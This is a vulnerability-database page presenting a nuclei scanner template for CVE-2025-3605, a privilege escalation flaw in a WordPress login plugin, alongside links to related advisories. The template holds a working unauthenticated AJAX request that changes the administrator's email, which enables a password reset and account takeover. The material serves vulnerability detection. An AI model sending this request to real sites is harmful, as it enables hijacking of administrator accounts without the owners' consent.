Lucene search
+L

WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation

🗓️ 11 Sep 2026 05:22:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

Unauthenticated attacker can escalate to admin by changing the email and resetting password via an AJAX endpoint.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2025-3605
15 May 202516:08
githubexploit
githubexploit
GithubExploit
Exploit for CVE-2025-3605
9 May 202521:45
githubexploit
circl
Circl
CVE-2025-3605
9 May 202510:21
circl
cve
CVE
CVE-2025-3605
9 May 202506:42
cve
cvelist
Cvelist
CVE-2025-3605 Frontend Login and Registration Blocks <= 1.1.1 - Unauthenticated Privilege Escalation via Account Takeover
9 May 202506:42
cvelist
exploitdb
Exploit DB
WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation
13 May 202500:00
exploitdb
euvd
EUVD
EUVD-2025-14130
9 May 202506:42
euvd
kitploit
Kitploit
CVE-2025-3605
6 Sep 202617:10
kitploit
nvd
NVD
CVE-2025-3605
9 May 202507:16
nvd
packetstorm
Packet Storm
📄 WordPress Frontend Login and Registration Blocks 1.0.7 Privilege Escalation
13 May 202500:00
packetstorm
Rows per page
id: CVE-2025-3605

info:
  name: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation
  author: beginee
  severity: critical
  description: |
    Privilege escalation vulnerability exists in the Frontend Login and Registration Blocks plugin for WordPress (versions <= 1.0.7). An unauthenticated attacker can exploit the AJAX endpoint flr_blocks_user_settings_handle_ajax_callback() to change the administrator's email address. Subsequently, the attacker can use the "Forgot Password" feature to reset the administrator's password, thereby gaining unauthorized access to the admin account.
  impact: |
    Unauthenticated attackers can change administrator email addresses through the AJAX endpoint, enabling password reset attacks and complete admin account takeover.
  remediation: |
    Upgrade WordPress Frontend Login and Registration Blocks plugin to version 1.0.8 or later that properly restricts user settings updates.
  reference:
    - https://wordpress.org/plugins/frontend-login-and-registration-blocks/
    - https://github.com/GadaLuBau1337/CVE-2025-3605/tree/main
    - https://nvd.nist.gov/vuln/detail/CVE-2025-3605
    - https://plugins.trac.wordpress.org/browser/frontend-login-and-registration-blocks/trunk/inc/class-flr-blocks-user-settings.php#L59
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0c11668c-6dc3-4539-b2be-bf6528bed73e?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-3605
    cwe-id: CWE-639
    epss-score: 0.06937
    epss-percentile: 0.93713
    cpe: cpe:2.3:a:wordpress:frontend_login_and_registration_blocks:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/frontend-login-and-registration-blocks/"
    publicwww-query: "/wp-content/plugins/frontend-login-and-registration-blocks/"
  tags: cve,cve2025,wp,wp-plugin,wordpress,frontend-login-and-registration-blocks,intrusive,vkev,vuln

variables:
  userid: "1"
  email: "{{rand_base(7)}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=flrblocksusersettingsupdatehandle&user_id={{userid}}&flr-blocks-email-update={{email}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'status":true'
          - 'Operation has been completed successfully'
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200

    extractors:
      - type: dsl
        dsl:
          - 'email'
# digest: 490a004630440220637667d11e3c9a14474db3a0dbb49174be63ba86e915e5b390caf842a0f818a0022016b3ac7866673d8c89c3c23f3c2c714a55ea0f7a123995f2440cb334075264b8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation